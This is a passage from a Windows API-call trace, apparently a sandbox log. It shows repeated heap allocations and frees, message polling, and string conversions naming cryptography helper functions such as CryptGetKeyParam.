hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0178.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.741] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0178.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2848 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0178.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.741] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.742] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0178.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.743] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0178.744] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.744] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0178.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0178.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0178.749] 